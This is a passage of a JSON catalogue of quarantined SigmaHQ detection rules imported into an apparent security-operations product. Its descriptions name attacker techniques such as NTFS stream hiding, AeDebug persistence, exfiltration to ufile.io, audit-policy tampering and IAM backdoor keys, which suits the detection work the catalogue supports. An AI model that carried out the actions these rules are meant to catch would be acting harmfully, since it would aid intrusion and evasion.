"sigmahq-sigma-08f26069-6f80-474b-8d1f-d971c6fedea0", "type": "detection", "name": "User Has Been Deleted Via Userdel", "description": "Detects execution of the \"userdel\" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-has-been-deleted-via-userdel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "08f26069-6f80-474b-8d1f-d971c6fedea0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_userdel.yml" } }, { "id": "sigmahq-sigma-0900463c-b33b-49a8-be1d-552a3b553dae", "type": "detection", "name": "Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI", "description": "Detects command line containing reference to the \"::$index_allocation\" stream, which can be used as a technique to prevent access to folders or files from tooling such as \"explorer.exe\" or \"powershell.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-hidden-directory-creation-via-ntfs-index-allocation-stream-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0900463c-b33b-49a8-be1d-552a3b553dae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml" } }, { "id": "sigmahq-sigma-090ffaad-c01a-4879-850c-6d57da98452d", "type": "detection", "name": "DNS Query To Ufile.io - DNS Client", "description": "Detects DNS queries to \"ufile.io\", which was seen abused by malware and threat actors as a method for data exfiltration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-ufile-io-dns-client.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "090ffaad-c01a-4879-850c-6d57da98452d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml" } }, { "id": "sigmahq-sigma-0922467f-db53-4348-b7bf-dee8d0d348c6", "type": "detection", "name": "New CA Policy by Non-approved Actor", "description": "Monitor and alert on conditional access changes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-ca-policy-by-non-approved-actor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0922467f-db53-4348-b7bf-dee8d0d348c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" } }, { "id": "sigmahq-sigma-092af964-4233-4373-b4ba-d86ea2890288", "type": "detection", "name": "Add Debugger Entry To AeDebug For Persistence", "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-debugger-entry-to-aedebug-for-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "092af964-4233-4373-b4ba-d86ea2890288", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" } }, { "id": "sigmahq-sigma-092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", "type": "detection", "name": "PowerShell Core DLL Loaded By Non PowerShell Process", "description": "Detects loading of essential DLLs used by PowerShell by non-PowerShell process.\nDetects behavior similar to meterpreter's \"load powershell\" extension.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-core-dll-loaded-by-non-powershell-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml" } }, { "id": "sigmahq-sigma-093d68c7-762a-42f4-9f46-95e79142571a", "type": "detection", "name": "Shell Execution via Nice - Linux", "description": "Detects the use of the \"nice\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-via-nice-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "093d68c7-762a-42f4-9f46-95e79142571a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_nice_shell_execution.yml" } }, { "id": "sigmahq-sigma-09438caa-07b1-4870-8405-1dbafe3dad95", "type": "detection", "name": "Azure Subscription Permission Elevation Via ActivityLogs", "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-subscription-permission-elevation-via-activitylogs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09438caa-07b1-4870-8405-1dbafe3dad95", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_subscription_permissions_elevation_via_activitylogs.yml" } }, { "id": "sigmahq-sigma-0944e002-e3f6-4eb5-bf69-3a3067b53d73", "type": "detection", "name": "PowerShell Set-Acl On Windows Folder", "description": "Detects PowerShell scripts to set the ACL to a file in the Windows folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-set-acl-on-windows-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0944e002-e3f6-4eb5-bf69-3a3067b53d73", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml" } }, { "id": "sigmahq-sigma-0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "type": "detection", "name": "Use of Pcalua For Execution", "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-pcalua-for-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" } }, { "id": "sigmahq-sigma-09570ae5-889e-43ea-aac0-0e1221fb3d95", "type": "detection", "name": "Remove Exported Mailbox from Exchange Webserver", "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remove-exported-mailbox-from-exchange-webserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" } }, { "id": "sigmahq-sigma-09576804-7a05-458e-a817-eb718ca91f54", "type": "detection", "name": "Suspicious PowerShell IEX Execution Patterns", "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-iex-execution-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09576804-7a05-458e-a817-eb718ca91f54", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml" } }, { "id": "sigmahq-sigma-09658312-bc27-4a3b-91c5-e49ab9046d1b", "type": "detection", "name": "WMIC Unquoted Services Path Lookup - PowerShell", "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmic-unquoted-services-path-lookup-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09658312-bc27-4a3b-91c5-e49ab9046d1b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" } }, { "id": "sigmahq-sigma-09706624-b7f6-455d-9d02-adee024cee1d", "type": "detection", "name": "HackTool - CobaltStrike BOF Injection Pattern", "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-cobaltstrike-bof-injection-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09706624-b7f6-455d-9d02-adee024cee1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml" } }, { "id": "sigmahq-sigma-098d7118-55bc-4912-a836-dc6483a8d150", "type": "detection", "name": "Access To ADMIN$ Network Share", "description": "Detects access to ADMIN$ network share", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/access-to-admin-network-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "098d7118-55bc-4912-a836-dc6483a8d150", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_admin_share_access.yml" } }, { "id": "sigmahq-sigma-09a910bf-f71f-4737-9c40-88880ba5913d", "type": "detection", "name": "Potential Base64 Decoded From Images", "description": "Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-base64-decoded-from-images.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09a910bf-f71f-4737-9c40-88880ba5913d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_tail_base64_decode_from_image.yml" } }, { "id": "sigmahq-sigma-09d3b48b-be17-47f5-bf4e-94e7e75d09ce", "type": "detection", "name": "Potential Malicious AppX Package Installation Attempts", "description": "Detects potential installation or installation attempts of known malicious appx packages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-malicious-appx-package-installation-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml" } }, { "id": "sigmahq-sigma-0a1255c5-d732-4b62-ac02-b5152d34fb83", "type": "detection", "name": "ADExplorer Writing Complete AD Snapshot Into .dat File", "description": "Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002", "T1069.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/adexplorer-writing-complete-ad-snapshot-into-dat-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a1255c5-d732-4b62-ac02-b5152d34fb83", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_adexplorer_dump_written.yml" } }, { "id": "sigmahq-sigma-0a13e132-651d-11eb-ae93-0242ac130002", "type": "detection", "name": "Audit Policy Tampering Via Auditpol", "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audit-policy-tampering-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a13e132-651d-11eb-ae93-0242ac130002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_auditpol_susp_execution.yml" } }, { "id": "sigmahq-sigma-0a1f9d29-6465-4776-b091-7f43b26e4c89", "type": "detection", "name": "Prefetch File Deleted", "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/prefetch-file-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" } }, { "id": "sigmahq-sigma-0a3ff354-93fc-4273-8a03-1078782de5b7", "type": "detection", "name": "Recon Activity via SASec", "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/recon-activity-via-sasec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a3ff354-93fc-4273-8a03-1078782de5b7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" } }, { "id": "sigmahq-sigma-0a4f6091-223b-41f6-8743-f322ec84930b", "type": "detection", "name": "Suspicious GUP Usage", "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-gup-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a4f6091-223b-41f6-8743-f322ec84930b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gup_suspicious_execution.yml" } }, { "id": "sigmahq-sigma-0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", "type": "detection", "name": "AWS IAM Backdoor Users Keys", "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-iam-backdoor-users-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_iam_backdoor_users_keys.yml" } }, { "id": "sigmahq-sigma-0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "type": "detection", "name": "Uncommon Userinit Child Process", "description": "Detects uncommon \"userinit.exe\" child processes, which could be a sign of uncommon shells or login scripts used for persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1037.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-userinit-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml" } }, { "id": "sigmahq-sigma-0a99eb3e-1617-41bd-b095-13dc767f3def", "type": "detection", "name": "HackTool - Jlaive In-Memory Assembly Execution", "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-jlaive-in-memory-assembly-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0a99eb3e-1617-41bd-b095-13dc767f3def", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml" } }, { "id": "sigmahq-sigma-0ac15ec3-d24f-4246-aa2a-3077bb1cf90e", "type": "detection", "name": "Privileged User Has Been Created", "description": "Detects the addition of a new user to a privileged group such as \"root\" or \"sudo\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/privileged-user-has-been-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ac15ec3-d24f-4246-aa2a-3077bb1cf90e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_privileged_user_creation.yml" } }, { "id": "sigmahq-sigma-0adc67e0-a68f-4ffd-9c43-28905aad5d6a", "type": "detection", "name": "HackTool - Koh Default Named Pipe", "description": "Detects creation of default named pipes used by the Koh tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1528", "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-koh-default-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_koh_default_pipe.yml" } }, { "id": "sigmahq-sigma-0adfbc14-0ed1-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation VAR+ Launcher - PowerShell", "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" } }, { "id": "sigmahq-sigma-0afbd410-de03-4078-8491-f132303cb67d", "type": "detection", "name": "Renamed NetSupport RAT Execution", "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-netsupport-rat-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0afbd410-de03-4078-8491-f132303cb67d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" } }, { "id": "sigmahq-sigma-0afecb6e-6223-4a82-99fb-bf5b981e92a5", "type": "detection", "name": "Remote Access Tool - ScreenConnect Temporary File", "description": "Detects the creation of files in a specific location by ScreenConnect RMM.\nScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to \":\\Users\\\\Documents\\ConnectWiseControl\\Temp\\\" before execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-temporary-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0afecb6e-6223-4a82-99fb-bf5b981e92a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml" } }, { "id": "sigmahq-sigma-0b0cd537-fc77-4e6e-a973-e53495c1083d", "type": "detection", "name": "Renamed Office Binary Execution", "description": "Detects the execution of a renamed office binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-office-binary-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 